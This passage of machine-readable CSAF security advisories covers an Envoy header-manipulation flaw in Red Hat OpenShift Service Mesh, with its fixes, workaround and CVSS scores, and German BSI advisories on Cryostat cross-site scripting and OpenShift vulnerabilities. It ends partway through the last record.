"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45806"
},
{
"category": "external",
"summary": "RHBZ#2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf"
}
],
"release_date": "2024-09-20T00:15:02.293000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Potential to manipulate `x-envoy` headers from external sources"
}
]
}
WID-SEC-W-2024-3089
Vulnerability from csaf_certbund - Published: 2024-10-06 22:00 - Updated: 2025-02-10 23:00Summary
Red Hat Enterprise Linux (Cryostat): Mehrere Schwachstellen ermöglichen Cross-Site Scripting
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat Enterprise Linux (RHEL) ist eine populäre Linux-Distribution.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux in der Cryostat Komponente ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.
Betroffene Betriebssysteme
- UNIX
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat Enterprise Linux (RHEL) ist eine popul\u00e4re Linux-Distribution.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux in der Cryostat Komponente ausnutzen, um einen Cross-Site Scripting Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-3089 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3089.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-3089 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3089"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-10-06",
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8023 vom 2024-10-14",
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8113 vom 2024-10-15",
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10762 vom 2024-12-03",
"url": "https://access.redhat.com/errata/RHSA-2024:10762"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10906 vom 2024-12-10",
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0892 vom 2025-02-03",
"url": "https://access.redhat.com/errata/RHSA-2025:0892"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:1249 vom 2025-02-10",
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
}
],
"source_lang": "en-US",
"title": "Red Hat Enterprise Linux (Cryostat): Mehrere Schwachstellen erm\u00f6glichen Cross-Site Scripting",
"tracking": {
"current_release_date": "2025-02-10T23:00:00.000+00:00",
"generator": {
"date": "2025-02-11T09:42:26.924+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.10"
}
},
"id": "WID-SEC-W-2024-3089",
"initial_release_date": "2024-10-06T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-10-06T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-10-13T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-14T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-01T23:00:00.000+00:00",
"number": "4",
"summary": "Hinweis auf Komponente Cryostat erg\u00e4nzt"
},
{
"date": "2024-12-03T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-09T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-02-02T23:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-02-10T23:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "8"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version_range",
"name": "8 Cryostat \u003c3",
"product": {
"name": "Red Hat Enterprise Linux 8 Cryostat \u003c3",
"product_id": "T037986"
}
},
{
"category": "product_version",
"name": "8 Cryostat 3",
"product": {
"name": "Red Hat Enterprise Linux 8 Cryostat 3",
"product_id": "T037986-fixed",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:8_cryostat__3"
}
}
},
{
"category": "product_version",
"name": "Discovery",
"product": {
"name": "Red Hat Enterprise Linux Discovery",
"product_id": "T040951",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:discovery"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"notes": [
{
"category": "description",
"text": "In der Cryostat Komponente Red Hat Enterprise Linux existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgem\u00e4\u00df \u00fcberpr\u00fcft, bevor sie an den Benutzer zur\u00fcckgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausf\u00fchren. Beide Schwachstellen erfordern komplexe Techniken wie Nesting oder beruhen auf der Injektion von nicht sanitisiertem HTML in bestimmte Anwendungen mit bestehenden Sanitisierungsfehlern. Zur erfolgreichen Ausnutzung ist eine Benutzeraktion erforderlich."
}
],
"product_status": {
"known_affected": [
"67646",
"T040951",
"T037986"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-43788"
},
{
"cve": "CVE-2024-45801",
"notes": [
{
"category": "description",
"text": "In der Cryostat Komponente Red Hat Enterprise Linux existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgem\u00e4\u00df \u00fcberpr\u00fcft, bevor sie an den Benutzer zur\u00fcckgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausf\u00fchren. Beide Schwachstellen erfordern komplexe Techniken wie Nesting oder beruhen auf der Injektion von nicht sanitisiertem HTML in bestimmte Anwendungen mit bestehenden Sanitisierungsfehlern. Zur erfolgreichen Ausnutzung ist eine Benutzeraktion erforderlich."
}
],
"product_status": {
"known_affected": [
"67646",
"T040951",
"T037986"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-45801"
}
]
}
WID-SEC-W-2024-3250
Vulnerability from csaf_certbund - Published: 2024-10-21 22:00 - Updated: 2025-06-04 22:00Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um einen Denial of Service Angriff durchzuführen, Daten zu manipulieren, vertrauliche Informationen preiszugeben, einen Cross-Site-Scripting-Angriff durchzuführen und beliebigen Code auszuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
